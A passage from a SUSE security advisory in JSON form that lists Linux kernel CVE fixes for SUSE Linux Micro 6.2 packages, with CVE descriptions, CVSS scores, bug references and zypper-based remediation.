"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71138"
},
{
"cve": "CVE-2025-71141",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71141"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/tilcdc: Fix removal actions in case of failed probe\n\nThe drm_kms_helper_poll_fini() and drm_atomic_helper_shutdown() helpers\nshould only be called when the device has been successfully registered.\nCurrently, these functions are called unconditionally in tilcdc_fini(),\nwhich causes warnings during probe deferral scenarios.\n\n[ 7.972317] WARNING: CPU: 0 PID: 23 at drivers/gpu/drm/drm_atomic_state_helper.c:175 drm_atomic_helper_crtc_duplicate_state+0x60/0x68\n...\n[ 8.005820] drm_atomic_helper_crtc_duplicate_state from drm_atomic_get_crtc_state+0x68/0x108\n[ 8.005858] drm_atomic_get_crtc_state from drm_atomic_helper_disable_all+0x90/0x1c8\n[ 8.005885] drm_atomic_helper_disable_all from drm_atomic_helper_shutdown+0x90/0x144\n[ 8.005911] drm_atomic_helper_shutdown from tilcdc_fini+0x68/0xf8 [tilcdc]\n[ 8.005957] tilcdc_fini [tilcdc] from tilcdc_pdev_probe+0xb0/0x6d4 [tilcdc]\n\nFix this by rewriting the failed probe cleanup path using the standard\ngoto error handling pattern, which ensures that cleanup functions are\nonly called on successfully initialized resources. Additionally, remove\nthe now-unnecessary is_registered flag.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71141",
"url": "https://www.suse.com/security/cve/CVE-2025-71141"
},
{
"category": "external",
"summary": "SUSE Bug 1256756 for CVE-2025-71141",
"url": "https://bugzilla.suse.com/1256756"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71141"
},
{
"cve": "CVE-2025-71142",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71142"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpuset: fix warning when disabling remote partition\n\nA warning was triggered as follows:\n\nWARNING: kernel/cgroup/cpuset.c:1651 at remote_partition_disable+0xf7/0x110\nRIP: 0010:remote_partition_disable+0xf7/0x110\nRSP: 0018:ffffc90001947d88 EFLAGS: 00000206\nRAX: 0000000000007fff RBX: ffff888103b6e000 RCX: 0000000000006f40\nRDX: 0000000000006f00 RSI: ffffc90001947da8 RDI: ffff888103b6e000\nRBP: ffff888103b6e000 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000001 R11: ffff88810b2e2728 R12: ffffc90001947da8\nR13: 0000000000000000 R14: ffffc90001947da8 R15: ffff8881081f1c00\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f55c8bbe0b2 CR3: 000000010b14c000 CR4: 00000000000006f0\nCall Trace:\n \u003cTASK\u003e\n update_prstate+0x2d3/0x580\n cpuset_partition_write+0x94/0xf0\n kernfs_fop_write_iter+0x147/0x200\n vfs_write+0x35d/0x500\n ksys_write+0x66/0xe0\n do_syscall_64+0x6b/0x390\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\nRIP: 0033:0x7f55c8cd4887\n\nReproduction steps (on a 16-CPU machine):\n\n # cd /sys/fs/cgroup/\n # mkdir A1\n # echo +cpuset \u003e A1/cgroup.subtree_control\n # echo \"0-14\" \u003e A1/cpuset.cpus.exclusive\n # mkdir A1/A2\n # echo \"0-14\" \u003e A1/A2/cpuset.cpus.exclusive\n # echo \"root\" \u003e A1/A2/cpuset.cpus.partition\n # echo 0 \u003e /sys/devices/system/cpu/cpu15/online\n # echo member \u003e A1/A2/cpuset.cpus.partition\n\nWhen CPU 15 is offlined, subpartitions_cpus gets cleared because no CPUs\nremain available for the top_cpuset, forcing partitions to share CPUs with\nthe top_cpuset. In this scenario, disabling the remote partition triggers\na warning stating that effective_xcpus is not a subset of\nsubpartitions_cpus. Partitions should be invalidated in this case to\ninform users that the partition is now invalid(cpus are shared with\ntop_cpuset).\n\nTo fix this issue:\n1. Only emit the warning only if subpartitions_cpus is not empty and the\n effective_xcpus is not a subset of subpartitions_cpus.\n2. During the CPU hotplug process, invalidate partitions if\n subpartitions_cpus is empty.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71142",
"url": "https://www.suse.com/security/cve/CVE-2025-71142"
},
{
"category": "external",
"summary": "SUSE Bug 1256748 for CVE-2025-71142",
"url": "https://bugzilla.suse.com/1256748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71142"
},
{
"cve": "CVE-2025-71143",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71143"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: samsung: exynos-clkout: Assign .num before accessing .hws\n\nCommit f316cdff8d67 (\"clk: Annotate struct clk_hw_onecell_data with\n__counted_by\") annotated the hws member of \u0027struct clk_hw_onecell_data\u0027\nwith __counted_by, which informs the bounds sanitizer (UBSAN_BOUNDS)\nabout the number of elements in .hws[], so that it can warn when .hws[]\nis accessed out of bounds. As noted in that change, the __counted_by\nmember must be initialized with the number of elements before the first\narray access happens, otherwise there will be a warning from each access\nprior to the initialization because the number of elements is zero. This\noccurs in exynos_clkout_probe() due to .num being assigned after .hws[]\nhas been accessed:\n\n UBSAN: array-index-out-of-bounds in drivers/clk/samsung/clk-exynos-clkout.c:178:18\n index 0 is out of range for type \u0027clk_hw *[*]\u0027\n\nMove the .num initialization to before the first access of .hws[],\nclearing up the warning.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71143",
"url": "https://www.suse.com/security/cve/CVE-2025-71143"
},
{
"category": "external",
"summary": "SUSE Bug 1256749 for CVE-2025-71143",
"url": "https://bugzilla.suse.com/1256749"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
